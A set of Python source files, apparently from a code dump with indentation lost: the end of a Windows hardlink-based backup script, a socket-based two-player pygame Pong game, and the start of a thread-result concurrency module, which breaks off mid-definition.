if isinstance(args, tuple) and len(args) > 0 and isinstance(args[0], queue.Queue):
while not args[0].empty() and threads[0].is_alive():
log_msg('Run threaded: queue size {}'.format(args[0].qsize()))
threads[0].join(300)
for thread in threads:
thread.join()
def check_file_info_worker(work_q: queue.Queue, file_infos: typing.List[FileInfo], removal_q: queue.Queue,
addition_q: queue.Queue, always_check_hash: bool):
while True:
try:
index = work_q.get_nowait()
except queue.Empty:
return
try:
sr = os.stat(file_infos[index].path)
stat_changed = file_infos[index].has_stat_changed(sr)
if stat_changed or always_check_hash:
hash_val = hash_file(file_infos[index].path)
if stat_changed or (hash_val != file_infos[index].hash_val):
if hash_val != file_infos[index].hash_val:
log_msg('Hash changed: {}'.format(file_infos[index].path))
else:
log_msg('Mismatch file info: {}'.format(file_infos[index].path))
removal_q.put(index)
addition_q.put(FileInfo(file_infos[index].path, hash_val, sr))
except OSError:
log_msg('File deleted: {}'.format(file_infos[index].path))
removal_q.put(index)
work_q.task_done()
def check_file_info(file_infos, always_check_hash):
work_queue = queue.Queue()
removal_q = queue.Queue()
addition_q = queue.Queue()
for i in range(len(file_infos)):
work_queue.put(i)
log_msg('check_file_info, work size: {}'.format(len(file_infos)))
run_threaded(check_file_info_worker, (work_queue, file_infos, removal_q, addition_q, always_check_hash))
removals = []
while not removal_q.empty():
removals.append(removal_q.get_nowait())
removals.sort(reverse = True)
for i in removals:
file_infos.pop(i)
while not addition_q.empty():
file_infos.append(addition_q.get_nowait())
def check_file_info_exists(file_infos):
removals = []
for i in range(len(file_infos)):
try:
if not os.path.exists(file_infos[i].path):
log_msg('File deleted: {}'.format(file_infos[i].path))
removals.append(i)
except OSError:
removals.append(i)
removals.reverse()
for i in removals:
file_infos.pop(i)
def populate_file_infos(file_infos, file_name):
try:
csvfile = open(file_name, 'r', newline='')
reader = csv.reader(csvfile)
for row in reader:
file_infos.append(FileInfo(csv_row=row))
csvfile.close()
except OSError as error:
        log_msg('Error reading csv: {}, {}'.format(file_name, str(error)))
def populate_hash_dict(hash_dict, file_name, check_hashes):
file_infos = []
populate_file_infos(file_infos, file_name)
check_file_info(file_infos, check_hashes)
for info in file_infos:
hash_dict[info.hash_val] = info
def populate_name_dict(name_dict, file_name, check_existence):
file_infos = []
populate_file_infos(file_infos, file_name)
if check_existence:
check_file_info_exists(file_infos)
for info in file_infos:
name_dict[info.path] = info
def write_file_infos(info_dict, file_name):
csvfile = open(file_name, 'w', newline='')
writer = csv.writer(csvfile)
for info in info_dict.values():
writer.writerow(info.make_csv_row())
csvfile.close()
def dest_path_from_source_path(backup_dir, source_path):
drive, path = os.path.splitdrive(source_path)
# Trim trailing ':' from drive
if len(drive) > 1:
drive = drive[:-1]
else:
drive = ''
path = path[1:]
# join ignores empty elements, so it's OK if drive is empty
return os.path.join(backup_dir, drive, path)
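# Illustrative example (assumed Windows-style paths, derived from the logic above): with
# backup_dir r'D:\backup\2020-01-01', a source path of r'C:\Users\me\file.txt' maps to
# r'D:\backup\2020-01-01\C\Users\me\file.txt'; the drive letter becomes the first
# subdirectory under the backup root.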
def generate_delta_files(backup_dir, delta_files):
file_size = 0
file_count = 0
for source in delta_files:
target_name = dest_path_from_source_path(backup_dir, source)
# test if we can read the source file. File is possibly open and not available for backup
try:
test_file = open(source, 'rb')
test_file.close()
available = True
except OSError:
log_msg('File {} is not available. Skipping.'.format(source))
available = False
if available and len(backup_dir) > 4:
os.makedirs(os.path.split(target_name)[0], exist_ok=True)
# look for previous backups from which to make a delta
# last two characters of backup_dir should be day. Replace them with '?'
search_path = backup_dir[:-2] + '??'
bdirs = glob.glob(search_path)
full_backup = None
for bdir in bdirs:
check_path = dest_path_from_source_path(bdir, source)
if os.path.exists(check_path):
# only use non-empty files as a source
# this avoids using an empty file as the base if there was an error copying the file
sr = os.stat(check_path)
if sr.st_size > 0:
full_backup = check_path
break
if full_backup:
log_msg('Full backup found: {}. Generating delta.'.format(full_backup))
target_name = target_name + '.patch'
log_msg('Calling xdelta3 full={}, source={}, target={}'.format(full_backup, source, target_name))
subprocess.call(['xdelta3.exe', '-e', '-B', '1000000000', '-W', '16777216', '-s', full_backup, source,
target_name])
else:
log_msg('Copying source: {}.'.format(source))
shutil.copy2(source, target_name)
stat_result = os.stat(target_name)
file_count += 1
file_size += stat_result.st_size
win32api.SetFileAttributes(target_name, win32con.FILE_ATTRIBUTE_READONLY)
return file_count, file_size
def generate_compressed_files(backup_dir, source_files):
file_size = 0
file_count = 0
for source in source_files:
target_name = dest_path_from_source_path(backup_dir, source + '.zip')
# test if we can read the source file. File is possibly open and not available for backup
try:
test_file = open(source, 'rb')
test_file.close()
available = True
except OSError:
log_msg('File {} is not available. Skipping.'.format(source))
available = False
if available:
os.makedirs(os.path.split(target_name)[0], exist_ok=True)
log_msg('compressing file {}.'.format(source))
            zf = zipfile.ZipFile(target_name, "w", zipfile.ZIP_DEFLATED)
            zf.write(source)
            zf.close()
stat_result = os.stat(target_name)
file_count += 1
file_size += stat_result.st_size
win32api.SetFileAttributes(target_name, win32con.FILE_ATTRIBUTE_READONLY)
return file_count, file_size
def backup_worker(source_queue: queue.Queue, backup_dir: str, hash_sources, hash_source_lock: threading.Lock,
always_hash_source: bool, hash_targets, hash_target_lock: threading.Lock, per_hash_locks, results_queue: queue.Queue):
linked_files = 0
linked_size = 0
new_bytes = 0
new_files = 0
while True:
try:
file_path = source_queue.get_nowait()
except queue.Empty:
results_queue.put( (linked_files, linked_size, new_bytes, new_files) )
return
try:
attributes = win32api.GetFileAttributes(file_path)
# skip dehydrated files
# win32con does not define FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS 0x400000
# or FILE_ATTRIBUTE_RECALL_ON_OPEN 0x40000
if (attributes & win32con.FILE_ATTRIBUTE_OFFLINE) == 0 and \
(attributes & 0x400000) == 0 and \
(attributes & 0x40000) == 0:
sr = os.stat(file_path)
info = None
if not always_hash_source:
with hash_source_lock:
if file_path in hash_sources:
info = hash_sources[file_path]
if info and not info.has_stat_changed(sr):
hash_val = info.hash_val
else:
if not always_hash_source:
log_msg('Hashing {}'.format(file_path))
hash_val = hash_file(file_path)
hash_sources[file_path] = FileInfo(file_path, hash_val, sr)
dest_path = dest_path_from_source_path(backup_dir, file_path)
use_copy = True
target_val = None
hash_lock = None
# It's possible for two threads to be working on files with the same hash.
# This is undesirable because we will miss hard linking opportunities.
# Create a lock per unique hash so only one thread can be copying/linking a hash at any one time.
with hash_target_lock:
if hash_val in per_hash_locks:
hash_lock = per_hash_locks[hash_val]
else:
hash_lock = threading.Lock()
per_hash_locks[hash_val] = hash_lock
if hash_lock:
hash_lock.acquire()
with hash_target_lock:
if hash_val in hash_targets:
target_val = hash_targets[hash_val]
if target_val:
# make link
try:
os.link(target_val.path, dest_path)
linked_files += 1
linked_size += sr.st_size
use_copy = False
except OSError:
pass
if use_copy:
# copy new file
log_msg('new file {}'.format(file_path))
shutil.copy2(file_path, dest_path)
win32api.SetFileAttributes(dest_path, win32con.FILE_ATTRIBUTE_READONLY)
sr = os.stat(dest_path)
new_bytes += sr.st_size
new_files += 1
with hash_target_lock:
hash_targets[hash_val] = FileInfo(dest_path, hash_val, sr)
if hash_lock:
hash_lock.release()
else:
log_msg('Skipping dehydrated file {}'.format(file_path))
except OSError as error:
log_msg('Exception handling file {}, {}'.format(file_path, str(error)))
source_queue.task_done()
def do_backup(backup_dir, sources, dest_hash_csv, source_hash_csv, latest_only_dirs, skip_files, always_hash_source,
always_hash_target):
"""
:param backup_dir: str: destination directory for backup
:param sources: list of source paths. All sub dirs are included
:param dest_hash_csv: csv file with hashes on destination volume
:param source_hash_csv: csv file with hashes on source volume
:param latest_only_dirs: list of directories from which only the single latest file is saved
:param skip_files: list of full paths that should be skipped (e.g. already captured via binary delta)
    :param always_hash_source: bool: if true, always hashes source file, without checking size or timestamps
:param always_hash_target: bool: if true, rehashes files on dest volume to verify hashes
:return:
"""
hash_targets = {}
hash_sources = {}
log_msg('Loading dest hashes. Always hash target: {}'.format(always_hash_target))
populate_hash_dict(hash_targets, dest_hash_csv, always_hash_target)
log_msg('Load source hashes. Always hash source: {}'.format(always_hash_source))
populate_name_dict(hash_sources, source_hash_csv, always_hash_source)
new_bytes = 0
log_msg('Executing backup')
log_msg('Skip files: {}'.format(skip_files))
new_files = 0
linked_files = 0
linked_size = 0
source_queue = queue.Queue()
for source_dir in sources:
for (dpath, dnames, fnames) in os.walk(source_dir):
dest_dir = dest_path_from_source_path(backup_dir, dpath)
os.makedirs(dest_dir, exist_ok=True)
if dpath in latest_only_dirs:
                latest_time = 0
                file_selected = []
                for file_name in fnames:
                    sr = os.stat(os.path.join(dpath, file_name))
                    if sr.st_mtime_ns > latest_time:
                        latest_time = sr.st_mtime_ns
                        file_selected = [file_name]
fnames = file_selected
for file_name in fnames:
file_path = os.path.join(dpath, file_name)
if file_path not in skip_files:
source_queue.put(file_path)
source_lock = threading.Lock()
target_lock = threading.Lock()
results = queue.Queue()
per_hash_locks = {}
log_msg('do_backup, work size: {}'.format(source_queue.qsize()))
run_threaded(backup_worker, (source_queue, backup_dir, hash_sources, source_lock, always_hash_source, hash_targets,
target_lock, per_hash_locks, results))
while not results.empty():
lf, ls, ns, nf = results.get_nowait()
linked_files += lf
linked_size += ls
new_bytes += ns
new_files += nf
write_file_infos(hash_targets, dest_hash_csv)
write_file_infos(hash_sources, source_hash_csv)
for hash_name in [dest_hash_csv, source_hash_csv]:
hash_dest_path = dest_path_from_source_path(backup_dir, hash_name)
# it's possible the file was already included in the backup. Don't copy over if so.
if not os.path.exists(hash_dest_path):
dir_path = os.path.split(hash_dest_path)[0]
os.makedirs(dir_path, exist_ok=True)
shutil.copy2(hash_name, hash_dest_path)
log_msg('Link count: {:,}, linked size: {:,}'.format(linked_files, linked_size))
log_msg('Total files: {:,}, total size: {:,}'.format(linked_files+new_files, linked_size+new_bytes))
return new_files, new_bytes
# returns a list of hardlinks for the given path, excluding the original path
def get_hardlinks(path):
drive, no_drive_path = os.path.splitdrive(path)
hardlinks = []
temp_names = win32file.FindFileNames(path)
# the response from win32file.FindFileNames needs some fixup
# We need to add the drive letter and remove the trailing NUL
for t_name in temp_names:
fixed_name = t_name[:-1]
# don't include the original path
if fixed_name != no_drive_path:
hardlinks.append(drive + fixed_name)
return hardlinks
def remove_tree_worker(delete_queue, root):
while True:
try:
file_path = delete_queue.get_nowait()
except queue.Empty:
return
exterior_path = None
paths_to_delete = [file_path]
hard_links = get_hardlinks(file_path)
for link in hard_links:
if link.startswith(root):
paths_to_delete.append(link)
else:
exterior_path = link
if not exterior_path:
log_msg('Deleting file: {}'.format(file_path))
try:
win32api.SetFileAttributes(file_path, win32con.FILE_ATTRIBUTE_NORMAL)
for path in paths_to_delete:
os.remove(path)
except OSError as error:
log_msg('Exception removing file {}, {}'.format(file_path, str(error)))
except pywintypes.error as pyw_error:
log_msg('Exception removing file {}, {}'.format(file_path, str(pyw_error)))
if len(hard_links) > 0:
try:
win32api.SetFileAttributes(hard_links[-1], win32con.FILE_ATTRIBUTE_READONLY)
except OSError:
pass
except pywintypes.error:
pass
delete_queue.task_done()
def walk_tree_worker(walk_queue, delete_queue, file_ids, id_lock):
while True:
try:
file_path = walk_queue.get_nowait()
except queue.Empty:
return
s_info = os.stat(file_path)
with id_lock:
if s_info.st_ino not in file_ids:
file_ids.add(s_info.st_ino)
delete_queue.put(file_path)
walk_queue.task_done()
def remove_tree(path):
log_msg('Remove tree: {}'.format(path))
delete_queue = queue.Queue()
file_ids = set()
walk_queue = queue.Queue()
id_lock = threading.Lock()
log_msg('Generating deletion list.')
for (dpath, dnames, fnames) in os.walk(path):
for file_name in fnames:
file_path = os.path.join(dpath, file_name)
walk_queue.put(file_path)
log_msg('Walk list size: {}'.format(walk_queue.qsize()))
run_threaded(walk_tree_worker, (walk_queue, delete_queue, file_ids, id_lock))
log_msg('Delete list size {}'.format(delete_queue.qsize()))
run_threaded(remove_tree_worker, (delete_queue, path))
try:
shutil.rmtree(path, True)
except OSError as error:
log_msg('Exception removing tree {}, {}'.format(path, str(error)))
def delete_excess(dest_dir, dest_hashes_csv, max_backup_count):
subdirs = []
dir_list = os.scandir(dest_dir)
for dir_entry in dir_list:
if dir_entry.is_dir():
subdirs.append(dir_entry.name)
log_msg('Checking excess. Max count: {}, directory count: {}'.format(max_backup_count, len(subdirs)))
if len(subdirs) > max_backup_count:
subdirs.sort()
subdirs = subdirs[:len(subdirs) - max_backup_count]
hash_dest = {}
populate_name_dict(hash_dest, dest_hashes_csv, False)
for subdir in subdirs:
path_prefix = os.path.join(dest_dir, subdir)
log_msg('Removing directory: {}'.format(path_prefix))
deletions = []
additions = []
for key, value in hash_dest.items():
if key.startswith(path_prefix):
deletions.append(key)
links = get_hardlinks(key)
if links:
for link in reversed(links):
if not link.startswith(path_prefix):
value.path = link
additions.append((value.path, value))
break
for del_path in deletions:
hash_dest.pop(del_path)
for add_tuple in additions:
hash_dest[add_tuple[0]] = add_tuple[1]
# write the new hash list before attempting delete, in case of an error
write_file_infos(hash_dest, dest_hashes_csv)
remove_tree(path_prefix)
def print_help():
print('backup.py - Backup with hardlinks')
print('python backup.py config_file [-help]')
print('This script maintains a catalog of hashes on the backup source and target. When creating a new backup file '
'this allows us to hardlink the new files rather than copying a new set of bits. The first backup set '
'consumes the full size, but later sets only use space for new or changed content. Unchanged files only '
'require a hardlink\n')
print('Options are stored in a yaml config file. All path comparisons are case sensitive. You must write any path '
'exactly as the OS presents it.')
print('sources: Required. A yaml string list of source directories. Each directory is fully traversed during the '
'backup.')
print('dest: Required. The path to the backup destination. Backups become subdirectories as YYYY-MM-DD. ')
print('source_hashes: Required. A csv file to load and store source file info. Each source file has hash, size, and'
' timestamps. Size and timestamps are used to avoid rehashing. Can be non-existent at first, the script will '
'generate it as needed. It should never be edited, the script will read and write it as needed.')
print('dest_hashes: Required. A csv file to load and store destination file info. Each unique hash in the target '
'area is tracked with path, hash, size, and timestamps. When a source file matches a target hash, a hardlink '
'is created instead of a full copy. Size and timestamps are used to check for changes at start. Can be '
'non-existent at first, the script will generate it as needed. It should never be edited, the script will '
'read and write it as needed.')
print('sources_file: Optional. Pull the sources list from a separate yaml file. This will add any entries to '
'the local "sources:", "delta_files:", and "latest_only_dirs:". Useful when multiple backup sets need the '
'same source list.')
print('delta_files: Optional. A yaml string list of files to generate a binary delta of. Very useful for large mail'
' store files. At first, a full copy of the file is made. On subsequent backups, if a full version is found '
'in the earlier backups then a binary delta from the earlier full version is stored. Given the YYYY-MM-DD '
'format, the routine looks for YYYY-MM-??, basically any full copy within the current month. This option '
'requires the utility xdelta3.exe to be on the path. This option is incompatible with "use_date: false"')
print('use_date: Optional, default true. true or false. Sets whether a date encoded subdirectory should be created '
'under the dest: directory. Useful if copying a set of already dated archives to a new destination')
print('always_hash_source: Optional, default false. If true, source files are hashed every time. If false, size and'
' timestamps are used to determine if a source file has changed.')
print('always_hash_target: Optional, default false. If true, at start hash targets in the dest directory are '
'rehashed to confirm our current hash information is correct. Only the unique hash targets (not all files) '
'are hashed. If false, size and timestamps are used to determine if a target file has changed.')
print('latest_only_dirs: Optional. If any of these directories are traversed, only the single latest file is '
'included. All other files are skipped. Useful for log or backup directories for other software.')
print('max_backup_count: Optional. Numeric. If set, when the backup count (as counted by the number of '
'subdirectories under the "dest:" directory) exceeds this number the oldest directories are removed. This '
'option requires the backup directories lexicographically sort in date order. Timestamps are not used. Any '
'hash targets in the directories to be removed are repointed to existing hardlinks or removed from the list '
'if no other hardlinks exist.')
    print('thread_count: Optional. Reserved; the worker thread count is currently fixed at 16 in the script.')
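# Illustrative config yaml (values and paths below are made up, shown only to mirror the
# options documented in print_help; the real file is whatever you pass on the command line):
#
#   sources:
#     - C:\Users\me\Documents
#     - C:\Projects
#   dest: D:\backup
#   source_hashes: D:\backup\source_hashes.csv
#   dest_hashes: D:\backup\dest_hashes.csv
#   delta_files:
#     - C:\Mail\mailstore.pst
#   latest_only_dirs:
#     - C:\Logs
#   max_backup_count: 30
#   always_hash_source: false
#   always_hash_target: false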
def main():
parser = argparse.ArgumentParser(description='Backup with hardlinks')
parser.add_argument('config_file', help='Path to configuration yaml file')
parser.add_argument('-help', help='Print detailed help information',
action='store_true')
parser.add_argument('-date_override', help='Text to override date string. Used for script testing')
parser.add_argument('-no_backup', action='store_true', help='Skip backup, do delete check. Used for testing')
args = parser.parse_args()
if args.help:
print_help()
elif args.config_file:
with open(args.config_file, 'r') as stream:
config = yaml.safe_load(stream)
if 'sources_file' in config:
print('Using sources file: {}'.format(config['sources_file']))
with open(config['sources_file'], 'r') as stream:
sources = yaml.safe_load(stream)
if 'sources' in sources:
if 'sources' in config:
config['sources'].append(sources['sources'])
else:
config['sources'] = sources['sources']
if 'delta_files' in sources:
if 'delta_files' in config:
config['delta_files'].extend(sources['delta_files'])
else:
config['delta_files'] = sources['delta_files']
if 'compressed_files' in sources:
if 'compressed_files' in config:
config['compressed_files'].extend(sources['compressed_files'])
else:
config['compressed_files'] = sources['compressed_files']
if 'latest_only_dirs' in sources:
if 'latest_only_dirs' in config:
config['latest_only_dirs'].extend(sources['latest_only_dirs'])
else:
config['latest_only_dirs'] = sources['latest_only_dirs']
if 'dest' in config and 'sources' in config and 'dest_hashes' in config and 'source_hashes' in config:
use_date = True
if 'use_date' in config and not config['use_date']:
use_date = False
if use_date:
if args.date_override:
date_string = args.date_override
else:
date_string = date.today().strftime('%Y-%m-%d')
backup_dir = os.path.join(config['dest'], date_string)
else:
backup_dir = config['dest']
if (not use_date) and 'delta_files' in config and len(config['delta_files']) > 0:
print('Setting use_date: false and having delta_files is incompatible. Exiting.')
sys.exit(1)
always_hash_source = False
if 'always_hash_source' in config and config['always_hash_source']:
always_hash_source = True
always_hash_target = False
if 'always_hash_target' in config and config['always_hash_target']:
always_hash_target = True
latest_only_dirs = []
if 'latest_only_dirs' in config:
latest_only_dirs = config['latest_only_dirs']
# if 'thread_count' in config:
# thread_count = config['thread_count']
print('dest: {}'.format(config['dest']))
print('sources: {}'.format(config['sources']))
print('dest_hashes: {}'.format(config['dest_hashes']))
print('source_hashes: {}'.format(config['source_hashes']))
print('use_date: {}'.format(use_date))
print('always_hash_source: {}'.format(always_hash_source))
print('always_hash_target: {}'.format(always_hash_target))
print('latest_only_dirs: {}'.format(latest_only_dirs))
print('backup directory: {}'.format(backup_dir))
if 'max_backup_count' in config:
print('max_backup_count: {}'.format(config['max_backup_count']))
else:
print('max_backup_count: not set')
print('no_backup: {}'.format(args.no_backup))
# print('thread_count: {}'.format(thread_count))
os.makedirs(backup_dir, exist_ok=True)
new_files = 0
new_bytes = 0
skip_files = []
counts = (0, 0)
if not args.no_backup:
if 'delta_files' in config:
log_msg('delta_files: {}'.format(config['delta_files']))
# since we made a delta of the file, make sure we skip it during the actual backup
# it's possible the delta file is included in the traversal of the main backup
skip_files.extend(config['delta_files'])
try:
counts = generate_delta_files(backup_dir, config['delta_files'])
new_files += counts[0]
new_bytes += counts[1]
except OSError as error:
log_msg('Failure generating delta files. {}'.format(str(error)))
if 'compressed_files' in config:
log_msg('compressed_files: {}'.format(config['compressed_files']))
# since we made a zip of the file, make sure we skip it during the actual backup
# it's possible the zip file is included in the traversal of the main backup
skip_files.extend(config['compressed_files'])
try:
counts = generate_compressed_files(backup_dir, config['compressed_files'])
new_files += counts[0]
new_bytes += counts[1]
except OSError as error:
log_msg('Failure generating compressed files. {}'.format(str(error)))
counts = do_backup(backup_dir, config['sources'], config['dest_hashes'], config['source_hashes'],
latest_only_dirs, skip_files, always_hash_source, always_hash_target)
if 'max_backup_count' in config:
delete_excess(config['dest'], config['dest_hashes'], config['max_backup_count'])
new_files += counts[0]
new_bytes += counts[1]
log_msg('New files: {:,}, bytes: {:,}'.format(new_files, new_bytes))
else:
print('Config file missing required values. No backup.')
else:
print('No config file specified.')
print_help()
sys.exit(0)
if __name__ == "__main__":
# execute only if run as a script
main()
|
pingpong.py
|
import socket
import os
import pygame
import threading
import random
import sys
class PingPongException(Exception):
pass
class Server:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def openServer(self):
server_address = (self.hostAddress, self.PORT)
try:
self.HOST.bind(server_address)
self.HOST.listen(1)
print("Server is open")
return 0
except IndexError:
print(server_address, "is not valid")
return 1
except OSError:
print(server_address, "is already in use")
return 2
class Client:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def connect(self):
while True:
IP = input("Address: ") # self.hostAddress
PORT = int(input("Port: ")) # self.PORT
try:
self.HOST.connect((IP, PORT))
print("Connected to", (IP, PORT))
break
except ConnectionRefusedError:
print((IP, PORT), "refused to connect")
except IndexError:
print((IP, PORT), "is not valid")
except OSError:
print((IP, PORT), "is not valid")
def showInfo(port):
hostName = socket.gethostname()
hostAddress = socket.gethostbyname(hostName)
print("Host Name:", hostName, "\n-----------------------")
print("Your IP:", hostAddress)
print("Your PORT:", port, "\n-----------------------")
def showDeviceInfo():
defaultPort = 12000
if sys.platform == 'win32':
os.system("cls")
else:
os.system("clear")
showInfo(defaultPort)
def Prompt():
connection = Server()
while True:
command = input("PingPongShell> ")
if command == "openserver":
connection.openServer()
while True:
client, address = connection.HOST.accept()
if client: # if client is connected
print("Connected by", address)
return connection.HOST, client
elif command == "connect":
connection = Client()
connection.connect()
break
elif command == "exit" or command == "quit":
userEvent = "The user exited the shell."
raise PingPongException(userEvent)
elif command == "help":
print("""Commands:
openserver - Opens a server
connect - Connects to an existing server
exit/quit - Exits the shell
help - Prints this help page""")
else:
print("Command '" + command + "' not found\nType 'help' for help.\n")
return connection.HOST, False
# Only run on server
class Ball:
def __init__(self, surface):
self.radius = 10
self.interface = surface
self.WIDTH, self.HEIGHT = pygame.display.get_surface().get_size()
self.location = [self.WIDTH // 2, self.HEIGHT // 2]
step = 5
self.speed = [random.choice((step, -step)), random.choice((step, -step))]
self.player_point = 0
def isCollision(self, player, competitor, top, bottom, left, right):
if self.location[0] <= left + self.radius: # collision with left edge of screen
self.speed[0] = -self.speed[0]
elif self.location[0] >= right - self.radius: # collision with right edge of screen
self.speed[0] = -self.speed[0]
self.player_point += 1
# collision with top and bottom edge of screen
elif self.location[1] <= top + self.radius or self.location[1] >= bottom - self.radius:
self.speed[1] = -self.speed[1]
# objects collision
elif self.location[0] <= player.location[0] + player.WIDTH + self.radius: # player
if player.location[1] <= self.location[1] <= player.location[1] + player.HEIGHT:
self.speed[0] = -self.speed[0]
elif self.location[0] >= competitor.location[0] - self.radius: # competitor
if competitor.location[1] <= self.location[1] <= competitor.location[1] + competitor.HEIGHT:
self.speed[0] = -self.speed[0]
def render(self):
WHITE = (255, 255, 255)
pygame.draw.circle(self.interface, WHITE, self.location, self.radius)
class Player:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [30, 30]
self.interface = surface
self.speed = 5
self.point = 0
def sendRequest(self, host, ball_location):
try:
location = "%s %s %s %s" % (self.location[1], ball_location[0], ball_location[1], self.point)
host.sendall(location.encode("utf-8"))
except ConnectionResetError:
print("Partner is disconnected")
pygame.quit()
except ConnectionAbortedError:
print("Your partner software has some errors")
pygame.quit()
def render(self):
AQUA = (0, 255, 255)
pygame.draw.rect(self.interface, AQUA, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class Competitor:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [970, 30]
self.interface = surface
self.SCREEN_WIDTH, self.SCREEN_HEIGHT = self.interface.get_size()
self.speed = 5
self.ball_location = [10, 10]
self.point = 0
self.requestErrors = 0
def handleRequest(self, client):
try:
data_received = client.recv(128).decode("utf-8")
location = data_received.split()
self.location[1] = int(location[0])
# ball_location[0] = midOfScreen + (midOfScreen - competitor_location)
self.ball_location[0] = self.SCREEN_WIDTH // 2 + (self.SCREEN_WIDTH // 2 - int(location[1]))
self.ball_location[1] = int(location[2])
self.point = int(location[3])
except ConnectionResetError:
print("The competitor disconnected")
self.requestErrors = 1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.requestErrors = 2
except BrokenPipeError:
print("The competitor disconnected")
self.requestErrors = 1
except IndexError:
print("The competitor disconnected")
self.requestErrors = 1
def render(self):
SALMON = (250, 128, 114)
pygame.draw.rect(self.interface, SALMON, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
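# Wire format note (derived from Player.sendRequest and Competitor.handleRequest above):
# each message is a utf-8 string of four space-separated fields,
# "paddle_y ball_x ball_y score"; the receiver mirrors ball_x around the middle of the
# screen so each player sees the ball from their own side.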
class PingPong:
init_directory = os.path.dirname(__file__)
def __init__(self):
self.WIDTH, self.HEIGHT = 1000, 500
self.screen = None
if sys.platform == 'win32':
icon = pygame.image.load("icon.png")
else:
icon = pygame.image.load(os.path.join(PingPong.init_directory, "icon.png"))
pygame.display.set_icon(icon)
def renderScoreBoard(self, player_point, competitor_point):
GREY = (128, 128, 128)
MIDDLE = [self.WIDTH // 2, self.HEIGHT // 2]
locate = 50
player_point = str(player_point)
competitor_point = str(competitor_point)
font = os.path.join(PingPong.init_directory, "cour.ttf")
size = 48
render_font = pygame.font.Font(font, size)
renderPlayerPoint = render_font.render(player_point, True, GREY)
renderCompetitorPoint = render_font.render(competitor_point, True, GREY)
self.screen.blit(renderPlayerPoint, (MIDDLE[0] - (2 * locate), MIDDLE[1] - (locate // 4)))
self.screen.blit(renderCompetitorPoint, (MIDDLE[0] + locate, MIDDLE[1] - (locate // 4)))
def start(self):
pygame.init()
frame = pygame.time.Clock()
FPS = 60
host, server = Prompt()
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
if server: # server
pygame.display.set_caption("Ping Pong ! Server")
host = server
else: # client
pygame.display.set_caption("Ping Pong ! Client")
gameOver = False
player = Player(self.screen)
competitor = Competitor(self.screen)
ball = Ball(self.screen)
BLACK = (0, 0, 0)
TOP, BOTTOM, LEFT, RIGHT = 0, self.HEIGHT, 0, self.WIDTH
while not gameOver:
self.screen.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameOver = True
# player moving
moving = pygame.key.get_pressed()
if moving[pygame.K_w] or moving[pygame.K_a] or moving[pygame.K_UP] or moving[pygame.K_RIGHT]:
player.location[1] -= player.speed
elif moving[pygame.K_s] or moving[pygame.K_d] or moving[pygame.K_DOWN] or moving[pygame.K_LEFT]:
player.location[1] += player.speed
if player.location[1] <= TOP:
player.location[1] = TOP
elif player.location[1] >= BOTTOM - player.HEIGHT:
player.location[1] = BOTTOM - player.HEIGHT
# if this host is server
if server:
                # the server owns the ball physics: advance it by its velocity each frame
ball.location[0] += ball.speed[0]
ball.location[1] += ball.speed[1]
else:
ball.location = competitor.ball_location
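            # Exchange state with the peer and run collision detection in worker threads
            # so that socket I/O does not block rendering.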
ball_parameters = (player, competitor, TOP, BOTTOM, LEFT, RIGHT)
ball_collision = threading.Thread(target=ball.isCollision, args=ball_parameters)
handling = threading.Thread(target=competitor.handleRequest, args=(host,))
sending = threading.Thread(target=player.sendRequest, args=(host, ball.location))
handling.start()
sending.start()
ball_collision.start()
if competitor.requestErrors:
break
player.point = ball.player_point
self.renderScoreBoard(player.point, competitor.point)
ball.render()
player.render()
competitor.render()
frame.tick(FPS)
pygame.display.update()
host.close()
pygame.quit()
if __name__ == "__main__":
game = PingPong()
showDeviceInfo()
while True:
game.start()
strategy.py
from multiprocessing.pool import AsyncResult, ApplyResult
from multiprocessing.pool import ThreadPool
from multipledispatch import dispatch
from collections.abc import Iterable
from threading import Thread, current_thread
from functools import wraps, partial as PartialFunction
from typing import List, Dict, Callable, Iterable as IterableType, Optional, Union, Tuple
from types import FunctionType, MethodType
from abc import ABC
from os import getpid
from ..framework.runnable import (
MRResult as _MRResult,
GeneralRunnableStrategy as _GeneralRunnableStrategy,
PoolRunnableStrategy as _PoolRunnableStrategy,
Resultable as _Resultable,
ResultState as _ResultState
)
from ..framework.factory import (
BaseFeatureAdapterFactory as _BaseFeatureAdapterFactory,
BaseList as _BaseList
)
from ..framework import BaseQueueTask as _BaseQueueTask
from ..concurrent.result import ConcurrentResult as _ConcurrentResult, ThreadPoolResult as _ThreadPoolResult
from ..types import MRTasks as _MRTasks
from ..mode import FeatureMode as _FeatureMode
from .. import PYTHON_MAJOR_VERSION, PYTHON_MINOR_VERSION
class ConcurrentStrategy(_Resultable, ABC):
_Strategy_Feature_Mode = _FeatureMode.Concurrent
_Thread_Running_Result: List[Dict[str, Union[AsyncResult, bool]]] = []
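    # Decorator that wraps a worker's target function and records the thread's pid, name,
    # ident (and native_id on Python 3.8+) together with its return value or raised
    # exception into the shared _Thread_Running_Result list.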
@classmethod
def save_return_value(cls, function: Callable) -> Callable:
__self = cls
@wraps(function)
def save_value_fun(*args, **kwargs) -> None:
_current_thread = current_thread()
if (PYTHON_MAJOR_VERSION, PYTHON_MINOR_VERSION) >= (3, 8):
_thread_result = {
"pid": getpid(),
"name": _current_thread.name,
"ident": _current_thread.ident,
"native_id": _current_thread.native_id
}
else:
_thread_result = {
"pid": getpid(),
"name": _current_thread.name,
"ident": _current_thread.ident
}
try:
value = function(*args, **kwargs)
except Exception as e:
_thread_result.update({
"successful": False,
"exception": e
})
else:
_thread_result.update({
"result": value,
"successful": True
})
finally:
__self._Thread_Running_Result.append(_thread_result)
return save_value_fun
def result(self) -> List[_ConcurrentResult]:
__concurrent_result = self._saving_process()
self.reset_result()
return __concurrent_result
def reset_result(self):
